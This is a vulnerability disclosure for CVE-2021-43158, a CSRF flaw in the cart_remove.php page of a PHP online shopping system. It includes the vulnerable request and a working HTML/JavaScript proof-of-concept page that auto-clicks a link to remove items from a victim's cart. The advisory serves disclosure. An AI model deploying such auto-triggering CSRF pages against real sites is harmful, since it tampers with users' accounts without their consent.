Headline

CVE-2021-43158: CSRF vulnerability in cart_remove.php allows a remote attacker to remove any product in the customer's cart · Issue #2 · projectworldsofficial/online-shopping-webvsite-in-php

In ProjectWorlds Online Shopping System PHP 1.0, a CSRF vulnerability in cart_remove.php allows a remote attacker to remove any product in the customer’s cart.

2 years ago

CVE

Open in Source

#csrf #vulnerability #web #git #java

Author

KhanhCM (@khanhchauminh)

Version: 1.0****Details

The GET request for removing a product with id=1 looks like this:

http://127.0.0.1:8888/cart_remove.php?id=1

Changing the value of the id parameter in the customer session will remove the product with that ID.
A remote attacker can embed the request into an innocent-looking hyperlink:

<a href="http://127.0.0.1:8888/cart_remove.php?id=1">View</a>

Step to reproduce

First, create a malicious HTML page then host a website containing that page.

PoC:

<html>
<head>
  <title>CSRF PoC</title>
</head>
<body>
  <p>CSRF PoC</p>
  <a id='link' href="http://127.0.0.1:8888/cart_remove.php?id=1">View</a>
  <script>
    document.getElementById('link').click();
  </script>
</body>
</html>

Entice the customer to click on the link to the malicious site. When the customer browses to that site, the link would be automatically clicked via JavaScript and the product will be removed.

Response in Burpsuite